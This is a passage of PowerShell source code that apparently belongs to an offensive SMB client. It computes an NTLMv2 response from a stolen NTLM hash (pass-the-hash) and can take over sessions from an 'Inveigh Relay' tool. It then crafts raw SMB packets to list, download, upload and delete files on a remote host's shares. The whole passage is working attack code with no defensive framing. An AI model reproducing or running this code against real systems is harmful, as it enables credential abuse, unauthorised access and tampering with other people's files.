2){$hash.SubString($i,2)}}) -join "-" $NTLM_hash_bytes = $NTLM_hash_bytes.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} $auth_hostname = (Get-ChildItem -path env:computername).Value $auth_hostname_bytes = [System.Text.Encoding]::Unicode.GetBytes($auth_hostname) $auth_domain_bytes = [System.Text.Encoding]::Unicode.GetBytes($Domain) $auth_username_bytes = [System.Text.Encoding]::Unicode.GetBytes($username) $auth_domain_length = [System.BitConverter]::GetBytes($auth_domain_bytes.Length)[0,1] $auth_domain_length = [System.BitConverter]::GetBytes($auth_domain_bytes.Length)[0,1] $auth_username_length = [System.BitConverter]::GetBytes($auth_username_bytes.Length)[0,1] $auth_hostname_length = [System.BitConverter]::GetBytes($auth_hostname_bytes.Length)[0,1] $auth_domain_offset = 0x40,0x00,0x00,0x00 $auth_username_offset = [System.BitConverter]::GetBytes($auth_domain_bytes.Length + 64) $auth_hostname_offset = [System.BitConverter]::GetBytes($auth_domain_bytes.Length + $auth_username_bytes.Length + 64) $auth_LM_offset = [System.BitConverter]::GetBytes($auth_domain_bytes.Length + $auth_username_bytes.Length + $auth_hostname_bytes.Length + 64) $auth_NTLM_offset = [System.BitConverter]::GetBytes($auth_domain_bytes.Length + $auth_username_bytes.Length + $auth_hostname_bytes.Length + 88) $HMAC_MD5 = New-Object System.Security.Cryptography.HMACMD5 $HMAC_MD5.key = $NTLM_hash_bytes $username_and_target = $username.ToUpper() $username_and_target_bytes = [System.Text.Encoding]::Unicode.GetBytes($username_and_target) $username_and_target_bytes += $auth_domain_bytes $NTLMv2_hash = $HMAC_MD5.ComputeHash($username_and_target_bytes) $client_challenge = [String](1..8 | ForEach-Object {"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)}) $client_challenge_bytes = $client_challenge.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} $security_blob_bytes = 0x01,0x01,0x00,0x00, 0x00,0x00,0x00,0x00 + $target_time_bytes + $client_challenge_bytes + 0x00,0x00,0x00,0x00 + $target_details + 0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00 $server_challenge_and_security_blob_bytes = $NTLM_challenge + $security_blob_bytes $HMAC_MD5.key = $NTLMv2_hash $NTLMv2_response = $HMAC_MD5.ComputeHash($server_challenge_and_security_blob_bytes) if($SMB_signing) { $session_base_key = $HMAC_MD5.ComputeHash($NTLMv2_response) $session_key = $session_base_key $HMAC_SHA256 = New-Object System.Security.Cryptography.HMACSHA256 $HMAC_SHA256.key = $session_key } $NTLMv2_response = $NTLMv2_response + $security_blob_bytes $NTLMv2_response_length = [System.BitConverter]::GetBytes($NTLMv2_response.Length)[0,1] $session_key_offset = [System.BitConverter]::GetBytes($auth_domain_bytes.Length + $auth_username_bytes.Length + $auth_hostname_bytes.Length + $NTLMv2_response.Length + 88) $NTLMSSP_response = 0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00, 0x03,0x00,0x00,0x00, 0x18,0x00, 0x18,0x00 + $auth_LM_offset + $NTLMv2_response_length + $NTLMv2_response_length + $auth_NTLM_offset + $auth_domain_length + $auth_domain_length + $auth_domain_offset + $auth_username_length + $auth_username_length + $auth_username_offset + $auth_hostname_length + $auth_hostname_length + $auth_hostname_offset + $session_key_length + $session_key_length + $session_key_offset + $negotiate_flags + $auth_domain_bytes + $auth_username_bytes + $auth_hostname_bytes + 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 + $NTLMv2_response if($SMB_version -eq 'SMB1') { $SMB_user_ID = $client_receive[32,33] $packet_SMB_header = New-PacketSMBHeader 0x73 0x18 0x07,0xc8 0xff,0xff $process_ID $SMB_user_ID if($SMB_signing) { $packet_SMB_header["Flags2"] = 0x05,0x48 } $packet_SMB_header["UserID"] = $SMB_user_ID $packet_NTLMSSP_negotiate = New-PacketNTLMSSPAuth $NTLMSSP_response $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header $NTLMSSP_negotiate = ConvertFrom-PacketOrderedDictionary $packet_NTLMSSP_negotiate $packet_SMB_data = New-PacketSMBSessionSetupAndXRequest $NTLMSSP_negotiate $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service $client_send = $NetBIOS_session_service + $SMB_header + $SMB_data } else { $message_ID++ $packet_SMB_header = New-PacketSMB2Header 0x01,0x00 0x00,0x00 $false $message_ID $process_ID $tree_ID $session_ID $packet_NTLMSSP_auth = New-PacketNTLMSSPAuth $NTLMSSP_response $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header $NTLMSSP_auth = ConvertFrom-PacketOrderedDictionary $packet_NTLMSSP_auth $packet_SMB_data = New-PacketSMB2SessionSetupRequest $NTLMSSP_auth $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service $client_send = $NetBIOS_session_service + $SMB_header + $SMB_data } try { $client_stream.Write($client_send,0,$client_send.Length) > $null $client_stream.Flush() $client_stream.Read($client_receive,0,$client_receive.Length) > $null if($SMB_version -eq 'SMB1') { if([System.BitConverter]::ToString($client_receive[9..12]) -eq '00-00-00-00') { Write-Verbose "[+] $output_username successfully authenticated on $Target" Write-Output "[-] SMB1 is only supported with signing check and authentication" $login_successful = $false } else { Write-Output "[!] $output_username failed to authenticate on $Target" $login_successful = $false } } else { if([System.BitConverter]::ToString($client_receive[12..15]) -eq '00-00-00-00') { Write-Verbose "[+] $output_username successfully authenticated on $Target" $login_successful = $true } else { Write-Output "[!] $output_username failed to authenticate on $Target" $login_successful = $false } } } catch { Write-Output "[-] $($_.Exception.Message)" $login_successful = $false } } } try { if($login_successful -or $inveigh_session) { if($inveigh_session) { if($inveigh_session -and $inveigh.session_lock_table[$session] -eq 'locked') { Write-Output "[*] Pausing due to Inveigh Relay session lock" Start-Sleep -s 2 } $inveigh.session_lock_table[$session] = 'locked' $client = $inveigh.session_socket_table[$session] $client_stream = $client.GetStream() $session_ID = $inveigh.session_table[$session] $message_ID = $inveigh.session_message_ID_table[$session] $tree_ID = 0x00,0x00,0x00,0x00 $SMB_signing = $false } $path = "\\" + $Target + "\IPC$" $path_bytes = [System.Text.Encoding]::Unicode.GetBytes($path) $directory_list = New-Object System.Collections.ArrayList $stage = 'TreeConnect' while ($stage -ne 'Exit') { switch($stage) { 'CloseRequest' { if(!$file_ID) { $file_ID = $client_receive[132..147] } $message_ID++ $packet_SMB2_header = New-PacketSMB2Header 0x06,0x00 0x01,0x00 $SMB_signing $message_ID $process_ID $tree_ID $session_ID $packet_SMB2_data = New-PacketSMB2CloseRequest $file_ID $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service if($SMB_signing) { $SMB2_sign = $SMB2_header + $SMB2_data $SMB2_signature = $HMAC_SHA256.ComputeHash($SMB2_sign) $SMB2_signature = $SMB2_signature[0..15] $packet_SMB2_header["Signature"] = $SMB2_signature $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header } $client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data $client_stream.Write($client_send,0,$client_send.Length) > $null $client_stream.Flush() $client_stream.Read($client_receive,0,$client_receive.Length) > $null $file_ID = '' if($directory_list.Count -gt 0 -and $Action -eq 'Recurse') { $file = $directory_list[0] $root_directory = $file + 0x5c,0x00 $create_request_extra_info = 1 $stage = 'CreateRequest' if($root_directory.Count -gt 2) { $root_directory_extract = [System.BitConverter]::ToString($root_directory) $root_directory_extract = $root_directory_extract -replace "-00","" if($root_directory.Length -gt 2) { $root_directory_extract = $root_directory_extract.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} $root_directory_string = New-Object System.String ($root_directory_extract,0,$root_directory_extract.Length) } else { $root_directory_string = [Char][System.Convert]::ToInt16($file,16) } } } elseif($Action -eq 'Get' -and $action_step -eq 1) { if($share_subdirectory -eq $source_file) { $file = "" } else { $file = [System.Text.Encoding]::Unicode.GetBytes($share_subdirectory.Replace('\' + $source_file,'')) } $create_request_extra_info = 1 $stage = 'CreateRequest' } elseif($Action -eq 'Delete') { switch($action_step) { 0 { if($share_subdirectory -eq $source_file) { $file = "" } else { $file = [System.Text.Encoding]::Unicode.GetBytes($share_subdirectory.Replace('\' + $source_file,'')) } $create_request_extra_info = 1 $stage = 'CreateRequest' $action_step++ } 1 { $stage = 'CreateRequestFindRequest' } 3 { $stage = 'TreeDisconnect' } } } elseif($share_subdirectory_start) { $share_subdirectory_start = $false $stage = 'CreateRequestFindRequest' } else { $stage = 'TreeDisconnect' } } 'CreateRequest' { $message_ID++ $packet_SMB2_header = New-PacketSMB2Header 0x05,0x00 0x01,0x00 $SMB_signing $message_ID $process_ID $tree_ID $session_ID $packet_SMB2_data = New-PacketSMB2CreateRequest $file $create_request_extra_info $source_file_size if($directory_list.Count -gt 0) { $packet_SMB2_data["DesiredAccess"] = 0x81,0x00,0x10,0x00 $packet_SMB2_data["ShareAccess"] = 0x07,0x00,0x00,0x00 } if($Action -eq 'Delete') { switch($action_step) { 0 { $packet_SMB2_data["CreateOptions"] = 0x00,0x00,0x20,0x00 $packet_SMB2_data["DesiredAccess"] = 0x80,0x00,0x00,0x00 $packet_SMB2_data["ShareAccess"] = 0x07,0x00,0x00,0x00 } 2 { $packet_SMB2_data["CreateOptions"] = 0x40,0x00,0x20,0x00 $packet_SMB2_data["DesiredAccess"] = 0x80,0x00,0x01,0x00 $packet_SMB2_data["ShareAccess"] = 0x07,0x00,0x00,0x00 } } } if($Action -eq 'Get') { $packet_SMB2_data["CreateOptions"] = 0x00,0x00,0x20,0x00 $packet_SMB2_data["DesiredAccess"] = 0x89,0x00,0x12,0x00 $packet_SMB2_data["ShareAccess"] = 0x05,0x00,0x00,0x00 } if($Action -eq 'Put') { switch($action_step) { 0 { $packet_SMB2_data["CreateOptions"] = 0x60,0x00,0x20,0x00 $packet_SMB2_data["DesiredAccess"] = 0x89,0x00,0x12,0x00 $packet_SMB2_data["ShareAccess"] = 0x01,0x00,0x00,0x00 $packet_SMB2_data["RequestedOplockLevel"] = 0xff } 1 { $packet_SMB2_data["CreateOptions"] = 0x64,0x00,0x00,0x00 $packet_SMB2_data["DesiredAccess"] = 0x97,0x01,0x13,0x00 $packet_SMB2_data["ShareAccess"] = 0x00,0x00,0x00,0x00 $packet_SMB2_data["RequestedOplockLevel"] = 0xff $packet_SMB2_data["FileAttributes"] = 0x20,0x00,0x00,0x00 $packet_SMB2_data["CreateDisposition"] = 0x05,0x00,0x00,0x00 } } } $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service if($SMB_signing) { $SMB2_sign = $SMB2_header + $SMB2_data $SMB2_signature = $HMAC_SHA256.ComputeHash($SMB2_sign) $SMB2_signature = $SMB2_signature[0..15] $packet_SMB2_header["Signature"] = $SMB2_signature $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header } $client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data $client_stream.Write($client_send,0,$client_send.Length) > $null $client_stream.Flush() $client_stream.Read($client_receive,0,$client_receive.Length) > $null if([System.BitConverter]::ToString($client_receive[12..15]) -ne '00-00-00-00') { $error_code = [System.BitConverter]::ToString($client_receive[15..12]) switch($error_code) { 'c0-00-01-03' { $stage = 'Exit' } 'c0-00-00-22' { if($directory_list.Count -gt 0) { $directory_list.RemoveAt(0) > $null } else { $output_message = "[-] Access denied" $share_subdirectory_start = $false } $stage = 'CloseRequest' } 'c0-00-00-34' { if($Action -eq 'Put') { $create_request_extra_info = 3 $action_step++ $stage = 'CreateRequest' } else { $output_message = "[-] File not found" $stage = 'Exit' } } 'c0-00-00-ba' { if($Action -eq 'Put') { $output_message = "[-] Destination filname must be specified" $stage = 'CloseRequest' } } default { $error_code = $error_code -replace "-","" $output_message = "[-] Create request error code 0x$error_code" $stage = 'Exit' } } } elseif($Action -eq 'Delete' -and $action_step -eq 2) { $set_info_request_file_info_class = 0x01 $set_info_request_info_level = 0x0d $set_info_request_buffer = 0x01,0x00,0x00,0x00 $file_ID = $client_receive[132..147] $stage = 'SetInfoRequest' } elseif($Action -eq 'Get' -and $action_step -ne 1) { switch($action_step) { 0 { $file_ID = $client_receive[132..147] $action_step++ $stage = 'CloseRequest' } 2 { if($file_size -lt 4096) { $read_request_length = $file_size } else { $read_request_length = 4096 } $read_request_offset = 0 $file_ID = $client_receive[132..147] $action_step++ $stage = 'ReadRequest' } 4 { $header_next_command = 0x68,0x00,0x00,0x00 $query_info_request_info_type_1 = 0x01 $query_info_request_file_info_class_1 = 0x07 $query_info_request_output_buffer_length_1 = 0x00,0x10,0x00,0x00 $query_info_request_input_buffer_offset_1 = 0x68,0x00 $query_info_request_buffer_1 = 0 $query_info_request_info_type_2 = 0x01 $query_info_request_file_info_class_2 = 0x16 $query_info_request_output_buffer_length_2 = 0x00,0x10,0x00,0x00 $query_info_request_input_buffer_offset_2 = 0x68,0x00 $query_info_request_buffer_2 = 0 $file_ID = $client_receive[132..147] $action_step++ $stage = 'QueryInfoRequest' } } } elseif($Action -eq 'Put') { switch($action_step) { 0 { if($Action -eq 'Put') { $output_message = "Destination file exists" $stage = 'CloseRequest' } } 1 { $file_ID = $client_receive[132..147] $action_step++ $header_next_command = 0x70,0x00,0x00,0x00 $query_info_request_info_type_1 = 0x02 $query_info_request_file_info_class_1 = 0x01 $query_info_request_output_buffer_length_1 = 0x58,0x00,0x00,0x00 $query_info_request_input_buffer_offset_1 = 0x00,0x00 $query_info_request_buffer_1 = 8 $query_info_request_info_type_2 = 0x02 $query_info_request_file_info_class_2 = 0x05 $query_info_request_output_buffer_length_2 = 0x50,0x00,0x00,0x00 $query_info_request_input_buffer_offset_2 = 0x00,0x00 $query_info_request_buffer_2 = 1 $stage = 'QueryInfoRequest' } } } elseif($share_subdirectory_start) { $file_ID = $client_receive[132..147] $stage = 'CloseRequest' } elseif($directory_list.Count -gt 0 -or $action_step -eq 1) { $stage = 'FindRequest' } else { $header_next_command = 0x70,0x00,0x00,0x00 $query_info_request_info_type_1 = 0x02 $query_info_request_file_info_class_1 = 0x01 $query_info_request_output_buffer_length_1 = 0x58,0x00,0x00,0x00 $query_info_request_input_buffer_offset_1 = 0x00,0x00 $query_info_request_buffer_1 = 8 $query_info_request_info_type_2 = 0x02 $query_info_request_file_info_class_2 = 0x05 $query_info_request_output_buffer_length_2 = 0x50,0x00,0x00,0x00 $query_info_request_input_buffer_offset_2 = 0x00,0x00 $query_info_request_buffer_2 = 1 $file_ID = $client_receive[132..147] $stage = 'QueryInfoRequest' if($share_subdirectory) { $share_subdirectory_start = $true } } } 'CreateRequestFindRequest' { $message_ID++ $packet_SMB2_header = New-PacketSMB2Header 0x05,0x00 0x01,0x00 $SMB_signing $message_ID $process_ID $tree_ID $session_ID $packet_SMB2_data = New-PacketSMB2CreateRequest $file 1 $packet_SMB2_data["DesiredAccess"] = 0x81,0x00,0x10,0x00 $packet_SMB2_data["ShareAccess"] = 0x07,0x00,0x00,0x00 $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data $packet_SMB2_header["NextCommand"] = [System.BitConverter]::GetBytes($SMB2_header.Length + $SMB2_data.Length) $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data if($SMB_signing) { $SMB2_sign = $SMB2_header + $SMB2_data $SMB2_signature = $HMAC_SHA256.ComputeHash($SMB2_sign) $SMB2_signature = $SMB2_signature[0..15] $packet_SMB2_header["Signature"] = $SMB2_signature $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header } $message_ID++ $packet_SMB2b_header = New-PacketSMB2Header 0x0e,0x00 0x01,0x00 $SMB_signing $message_ID $process_ID $tree_ID $session_ID $packet_SMB2b_header["NextCommand"] = 0x68,0x00,0x00,0x00 if($SMB_signing) { $packet_SMB2b_header["Flags"] = 0x0c,0x00,0x00,0x00 } else { $packet_SMB2b_header["Flags"] = 0x04,0x00,0x00,0x00 } $packet_SMB2b_data = New-PacketSMB2FindRequestFile 0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff 0x00,0x00,0x00,0x00,0x00,0x00 $SMB2b_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2b_header $SMB2b_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2b_data if($SMB_signing) { $SMB2_sign = $SMB2b_header + $SMB2b_data $SMB2_signature = $HMAC_SHA256.ComputeHash($SMB2_sign) $SMB2_signature = $SMB2_signature[0..15] $packet_SMB2b_header["Signature"] = $SMB2_signature $SMB2b_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2b_header } $message_ID++ $packet_SMB2c_header = New-PacketSMB2Header 0x0e,0x00 0x01,0x00 $SMB_signing $message_ID $process_ID $tree_ID $session_ID if($SMB_signing) { $packet_SMB2c_header["Flags"] = 0x0c,0x00,0x00,0x00 } else { $packet_SMB2c_header["Flags"] = 0x04,0x00,0x00,0x00 } $packet_SMB2c_data = New-PacketSMB2FindRequestFile 0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff $packet_SMB2c_data["OutputBufferLength"] = 0x80,0x00,0x00,0x00 $SMB2c_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2c_header $SMB2c_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2c_data $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService ($SMB2_header.Length + $SMB2b_header.Length + $SMB2c_header.Length) ($SMB2_data.Length + $SMB2b_data.Length + $SMB2c_data.Length) $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service if($SMB_signing) { $SMB2_sign = $SMB2c_header + $SMB2c_data $SMB2_signature = $HMAC_SHA256.ComputeHash($SMB2_sign) $SMB2_signature = $SMB2_signature[0..15] $packet_SMB2c_header["Signature"] = $SMB2_signature $SMB2c_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2c_header } $client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $SMB2b_header + $SMB2b_data + $SMB2c_header + $SMB2c_data $client_stream.Write($client_send,0,$client_send.Length) > $null $client_stream.Flush() $client_stream.Read($client_receive,0,$client_receive.Length) > $null if($Action -eq 'Delete') { $stage = 'CreateRequest' $file = [System.Text.Encoding]::Unicode.GetBytes($share_subdirectory) $action_step++ } else { $stage = 'ParseDirectoryContents' } } 'FindRequest' { $file_ID = $client_receive[132..147] $message_ID++ $packet_SMB2_header = New-PacketSMB2Header 0x0e,0x00 0x01,0x00 $SMB_signing $message_ID $process_ID $tree_ID $session_ID $packet_SMB2_header["NextCommand"] = 0x68,0x00,0x00,0x00 $packet_SMB2_data = New-PacketSMB2FindRequestFile $file_ID 0x00,0x00,0x00,0x00,0x00,0x00 $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data if($SMB_signing) { $SMB2_sign = $SMB2_header + $SMB2_data $SMB2_signature = $HMAC_SHA256.ComputeHash($SMB2_sign) $SMB2_signature = $SMB2_signature[0..15] $packet_SMB2_header["Signature"] = $SMB2_signature $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header } $message_ID++ $packet_SMB2b_header = New-PacketSMB2Header 0x0e,0x00 0x01,0x00 $SMB_signing $message_ID $process_ID $tree_ID $session_ID if($SMB_signing) { $packet_SMB2b_header["Flags"] = 0x0c,0x00,0x00,0x00 } else { $packet_SMB2b_header["Flags"] = 0x04,0x00,0x00,0x00 } $packet_SMB2b_data = New-PacketSMB2FindRequestFile $file_ID $packet_SMB2b_data["OutputBufferLength"] = 0x80,0x00,0x00,0x00 $SMB2b_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2b_header $SMB2b_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2b_data $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService ($SMB2_header.Length + $SMB2b_header.Length) ($SMB2_data.Length + $SMB2b_data.Length) $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service if($SMB_signing) { $SMB2_sign = $SMB2b_header + $SMB2b_data $SMB2_signature = $HMAC_SHA256.ComputeHash($SMB2_sign) $SMB2_signature = $SMB2_signature[0..15] $packet_SMB2b_header["Signature"] = $SMB2_signature $SMB2b_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2b_header } $client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $SMB2b_header + $SMB2b_data $client_stream.Write($client_send,0,$client_send.Length) > $null $client_stream.Flush() $client_stream.Read($client_receive,0,$client_receive.Length) > $null if($Action -eq 'Get' -and $action_step -eq 1) { $find_response = [System.BitConverter]::ToString($client_receive) $find_response = $find_response -replace "-","" $file_unicode = [System.BitConverter]::ToString([System.Text.Encoding]::Unicode.GetBytes($source_file)) $file_unicode = $file_unicode -replace "-","" $file_size_index = $find_response.IndexOf($file_unicode) - 128 $file_size = [System.BitConverter]::ToUInt32($client_receive[($file_size_index / 2)..($file_size_index / 2 + 7)],0) $action_step++ $create_request_extra_info = 1 $stage = 'CreateRequest' if($share_subdirectory -eq $file) { $file = [System.Text.Encoding]::Unicode.GetBytes($file) } else { $file = [System.Text.Encoding]::Unicode.GetBytes($share_subdirectory) } } else { $stage = 'ParseDirectoryContents' } } 'IoctlRequest' { $tree_ID = $client_receive[40..43] $ioctl_path = "\" + $Target + "\" + $Share $ioctl_path_bytes = [System.Text.Encoding]::Unicode.GetBytes($ioctl_path) + 0x00,0x00 $message_ID++ $packet_SMB2_header = New-PacketSMB2Header 0x0b,0x00 0x01,0x00 $SMB_signing $message_ID $process_ID $tree_ID $session_ID $packet_SMB2_data = New-PacketSMB2IoctlRequest $ioctl_path_bytes $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service if($SMB_signing) { $SMB2_sign = $SMB2_header + $SMB2_data $SMB2_signature = $HMAC_SHA256.ComputeHash($SMB2_sign) $SMB2_signature = $SMB2_signature[0..15] $packet_SMB2_header["Signature"] = $SMB2_signature $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header } $client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data $client_stream.Write($client_send,0,$client_send.Length) > $null $client_stream.Flush() $client_stream.Read($client_receive,0,$client_receive.Length) > $null $tree_ID = 0x00,0x00,0x00,0x00 $stage = 'TreeConnect' } 'Logoff' { $message_ID++ $packet_SMB2_header = New-PacketSMB2Header 0x02,0x00 0x01,0x00 $SMB_signing $message_ID $process_ID $tree_ID $session_ID $packet_SMB2_data = New-PacketSMB2SessionLogoffRequest $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service if($SMB_signing) { $SMB2_sign = $SMB2_header + $SMB2_data $SMB2_signature = $HMAC_SHA256.ComputeHash($SMB2_sign) $SMB2_signature = $SMB2_signature[0..15] $packet_SMB2_header["Signature"] = $SMB2_signature $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header } $client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data $client_stream.Write($client_send,0,$client_send.Length) > $null $client_stream.Flush() $client_stream.Read($client_receive,0,$client_receive.Length) > $null $stage = 'Exit' } 'ParseDirectoryContents' { $subdirectory_list = New-Object System.Collections.ArrayList $create_response_file = [System.BitConverter]::ToString($client_receive) $create_response_file = $create_response_file -replace "-","" $directory_contents_mode_list = New-Object System.Collections.ArrayList $directory_contents_create_time_list = New-Object System.Collections.ArrayList $directory_contents_last_write_time_list = New-Object System.Collections.ArrayList $directory_contents_length_list = New-Object System.Collections.ArrayList $directory_contents_name_list = New-Object System.Collections.ArrayList if($directory_list.Count -gt 0) { $create_response_file_index = 152 $directory_list.RemoveAt(0) > $null } else { $create_response_file_index = $create_response_file.Substring(10).IndexOf("FE534D42") + 154 } do { $SMB_next_offset = [System.BitConverter]::ToUInt32($client_receive[($create_response_file_index / 2 + $SMB_offset)..($create_response_file_index / 2 + 3 + $SMB_offset)],0) $SMB_file_length = [System.BitConverter]::ToUInt32($client_receive[($create_response_file_index / 2 + 40 + $SMB_offset)..($create_response_file_index / 2 + 47 + $SMB_offset)],0) $SMB_file_attributes = [Convert]::ToString($client_receive[($create_response_file_index / 2 + 56 + $SMB_offset)],2).PadLeft(16,'0') if($SMB_file_length -eq 0) { $SMB_file_length = $null } if($SMB_file_attributes.Substring(11,1) -eq '1') { $SMB_file_mode = "d" } else { $SMB_file_mode = "-" } if($SMB_file_attributes.Substring(10,1) -eq '1') { $SMB_file_mode+= "a" } else { $SMB_file_mode+= "-" } if($SMB_file_attributes.Substring(15,1) -eq '1') { $SMB_file_mode+= "r" } else { $SMB_file_mode+= "-" } if($SMB_file_attributes.Substring(14,1) -eq '1') { $SMB_file_mode+= "h" } else { $SMB_file_mode+= "-" } if($SMB_file_attributes.Substring(13,1) -eq '1') { $SMB_file_mode+= "s" } else { $SMB_file_mode+= "-" } $file_create_time = [Datetime]::FromFileTime([System.BitConverter]::ToInt64($client_receive[($create_response_file_index / 2 + 8 + $SMB_offset)..($create_response_file_index / 2 + 15 + $SMB_offset)],0)) $file_create_time = Get-Date $file_create_time -format 'M/d/yyyy h:mm tt' $file_last_write_time = [Datetime]::FromFileTime([System.BitConverter]::ToInt64($client_receive[($create_response_file_index / 2 + 24 + $SMB_offset)..($create_response_file_index / 2 + 31 + $SMB_offset)],0)) $file_last_write_time = Get-Date $file_last_write_time -format 'M/d/yyyy h:mm tt' $SMB_filename_length = [System.BitConverter]::ToUInt32($client_receive[($create_response_file_index / 2 + 60 + $SMB_offset)..($create_response_file_index / 2 + 63 + $SMB_offset)],0) $SMB_filename_unicode = $client_receive[($create_response_file_index / 2 + 104 + $SMB_offset)..($create_response_file_index / 2 + 104 + $SMB_offset + $SMB_filename_length - 1)] $SMB_filename = [System.BitConverter]::ToString($SMB_filename_unicode) $SMB_filename = $SMB_filename -replace "-00","" if($SMB_filename.Length -gt 2) { $SMB_filename = $SMB_filename.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} $SMB_filename_extract = New-Object System.String ($SMB_filename,0,$SMB_filename.Length) } else { $SMB_filename_extract = [String][Char][System.Convert]::ToInt16($SMB_filename,16) } if(!$Modify) { $file_last_write_time = $file_last_write_time.PadLeft(19,0) [String]$SMB_file_length = $SMB_file_length $SMB_file_length = $SMB_file_length.PadLeft(15,0) } if($SMB_file_attributes.Substring(11,1) -eq '1') { if($SMB_filename_extract -ne '.' -and $SMB_filename_extract -ne '..') { $subdirectory_list.Add($SMB_filename_unicode) > $null $directory_contents_name_list.Add($SMB_filename_extract) > $null $directory_contents_mode_list.Add($SMB_file_mode) > $null $directory_contents_length_list.Add($SMB_file_length) > $null $directory_contents_last_write_time_list.Add($file_last_write_time) > $null $directory_contents_create_time_list.Add($file_create_time) > $null } } else { $directory_contents_name_list.Add($SMB_filename_extract) > $null $directory_contents_mode_list.Add($SMB_file_mode) > $null $directory_contents_length_list.Add($SMB_file_length) > $null $directory_contents_last_write_time_list.Add($file_last_write_time) > $null $directory_contents_create_time_list.Add($file_create_time) > $null } if($share_subdirectory -and !$share_subdirectory_start) { $root_directory_string = $share_subdirectory + '\' } $SMB_offset += $SMB_next_offset } until($SMB_next_offset -eq 0) if($directory_contents_name_list) { if($root_directory_string) { $file_directory = $target_share + "\" + $root_directory_string.Substring(0,$root_directory_string.Length - 1) } else { $file_directory = $target_share } } $directory_contents_output = @() $i = 0 ForEach($directory in $directory_contents_name_list) { $directory_object = New-Object PSObject Add-Member -InputObject $directory_object -MemberType NoteProperty -Name Name -Value ($file_directory + "\" + $directory_contents_name_list[$i]) Add-Member -InputObject $directory_object -MemberType NoteProperty -Name Mode -Value $directory_contents_mode_list[$i] Add-Member -InputObject $directory_object -MemberType NoteProperty -Name Length -Value $directory_contents_length_list[$i] if($Modify) { Add-Member -InputObject $directory_object -MemberType NoteProperty -Name CreateTime -Value $directory_contents_create_time_list[$i] } Add-Member -InputObject $directory_object -MemberType NoteProperty -Name LastWriteTime -Value $directory_contents_last_write_time_list[$i] $directory_contents_output += 